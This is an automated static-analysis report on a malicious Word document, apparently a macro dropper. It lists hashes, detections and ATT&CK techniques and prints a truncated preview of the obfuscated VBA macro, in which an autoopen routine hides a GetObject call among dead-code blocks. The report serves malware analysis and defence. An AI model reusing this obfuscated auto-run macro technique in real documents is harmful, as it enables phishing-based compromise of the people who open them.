Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13ffc59fa86288c4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 205.5 KB
Created: 2019-04-03 21:02:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 7b97eeed662255206da79c378ba2b226
SHA-1: 1ddf1a0bda0f0bb9a08e3b88f82e6cb174535617
SHA-256: 13ffc59fa86288c408cec9b7834fce147cdfd462064e3bc605df8d42ed398e1e
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a legacy WordBasic autoopen macro. The presence of the 'autoopen' marker and the 'GetObject' call within the VBA p-code strongly suggests that the macro is designed to run automatically when the document is opened. In the extracted source, 'Sub autoopen()' calls 'VDUADAx', which is padded with conditional blocks that compare unequal integer constants (dead code that never executes) around a single 'GetObject' call whose argument is concatenated from form control properties ('.Text', '.ControlTipText') rather than written as a literal. This macro likely serves to download and execute a second-stage payload, a common technique for initial compromise.

Heuristics (7)

  • ClamAV: Doc.Malware.00536d-6931222-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6931222-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
  • GetObject call (high, OLE_VBA_GETOBJ)
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  23724 bytes
SHA-256: 483b447b822224b679f12772efa3053f24f59ccdd2bb76164c9694c70ce83511
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "aQAXAUX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iA4DAZAA"
Attribute VB_Base = "0{6B25BD22-9C99-4623-BD61-2C2FF7B9EAD8}{905F43FB-7DDE-4271-BCDF-F9FF060D1EF6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bxA_AAx"
Attribute VB_Base = "0{8396AB1A-0A0C-41C4-A23F-2D336DBF4567}{58F599E4-3279-4C87-9DCA-3DBC78A9510A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UAAwAUA"
Function B4DxxC()
   If 719222276 = 4113042 Then
   cCxGAAD _
= 373399491 - Asc(974483300) / 563509206 / _
602623635 * 111998884 - Rnd(RCXDAo / CVar(429638769))
   dCUBXQGA = dB_AQAA + _
Int(546887863) * wxAUCcG - SwDBD_A + (95616105 * 753352500)
End If
   If 776202244 = 156789423 Then
   EDUBw1_ _
= 541993349 - Asc(871210921) / 522573167 / _
264034843 * 660681505 - Rnd(cDAAAk / CVar(967989543))
   j1AUAAB = CBAAQA + _
Int(465614167) * fCAQwUU - VkAZQGQ + (780554797 * 266939200)
End If
End Function
Sub autoopen()
VDUADAx
End Sub
Function VDUADAx()
On Error Resume Next
   If 860065393 = 497303847 Then
   lwDxQA _
= 605887667 - Asc(779106947) / 994084501 / _
972368958 * 28694341 - Rnd(wUZ_AABA / CVar(375110659))
   IkZAUAG = bQwQA_ + _
Int(924162441) * zQxAADcU - IDGDAB + (840285052 * 650638086)
End If
   If 956041707 = 80812680 Then
   OAUXAxA_ _
= 436468480 - Asc(205560270) / 581533462 / _
20647257 * 891633797 - Rnd(dABAXAA / CVar(686180320))
   XoAoAD = mABAQAUQ + _
Int(360136155) * jAAZXDGk - zwBQCo + (134540422 * 514583384)
End If
   If 819241074 = 150583035 Then
   VZBoQUc _
= 176420080 - Asc(593669658) / 717229922 / _
979495612 * 156031694 - Rnd(qkxAZA / CVar(885932327))
   JwwABXAX = YwAZAQ + _
Int(76747132) * AQA4kXA - iAAZAB + (646819924 * 659464060)
End If
Set GGDAZUAx = GetObject(iA4DAZAA.RcAZxA1.Text + bxA_AAx.wBU1U4A + iA4DAZAA.RcAZxA1.ControlTipText)
   If 938901773 = 419009523 Then
   EBcAAc _
= 824893823 - Asc(192667517) / 59813052 / _
260216089 * 64228704 - Rnd(YG4AAAG / CVar(717028555))
   lAAU_c = jAo4_UAX + _
Int(411087057) * LwDkwQA - B4wAAQ1D + (539907916 * 579717901)
End If
   If 225264589 = 705557556 Then
   RAxA1ADA _
= 667118813 - Asc(312430838) / 580152966 / _
949425436 * 891934652 - Rnd(wAQCAA / CVar(793989335))
   pxBCwAAC = I_k4BB + _
Int(318502179) * OGXQUCA - nAAQAAx + (269066312 * 172363536)
End If
If 195187 = 195187 Then
   If 903110538 = 203163801 Then
   uXXx4Zc _
= 815318205 - Asc(419138346) / 32487252 / _
344779435 * 451077846 - Rnd(wQZQAAC / CVar(299446192))
   V_cD_DA = LUGA1Ao + _
Int(135559263) * UXAAoo - TDoQ4x + (704715446 * 602930089)
End If
   If 430872103 = 672460083 Then
   ODAABc _
= 613860897 - Asc(792174377) / 168607481 / _
991250284 * 803834410 - Rnd(Lc44Ak / CVar(290914548))
   YQUkBAG = dAGAAw + _
Int(265467400) * hBAGwA - PAQ4BAQ + (751548478 * 621320211)
End If
GGDAZUAx. _
ShOwWiNdOw = iA4DAZAA.qZADAcw - iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw
   If 593514299 = 109045821 Then
   iDXDxXD _
= 859713358 - Asc(788985564) / 515069524 / _
470050502 * 744653653 - Rnd(RBAUAoA / CVar(522555622))
   JDD1CXU = rCAQQCA1 + _
Int(280452044) * o_AA4U - XGBAXZ + (883953875 * 908624931)
End If
   If 353077305 = 129647101 Then
   vQAUQBAZ _
= 833070433 - Asc(531067672) / 68802721 / _
633560649 * 302348481 - Rnd(qAXAxA / CVar(581482800))
   OAAUQAA = LUQUGADw + _
Int(357308747) * LQxAUkwA - QADAAcA + (920509862 * 753648465)
End If
   If 345112841 = 463205560 Then
   pZQAABAA _
= 355378688
... (truncated)